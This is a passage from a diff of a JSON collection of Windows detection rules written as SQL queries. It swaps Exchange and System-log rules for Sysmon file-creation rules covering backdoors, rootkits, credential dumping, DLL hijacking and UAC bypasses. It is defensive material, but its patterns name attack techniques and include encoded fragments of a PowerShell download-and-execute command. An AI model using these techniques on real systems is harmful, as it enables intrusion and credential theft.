"filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the 
trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003.003" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE 
'%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": 
"test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE 
'%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE 
'\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 
'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": 
"Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was 
highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' 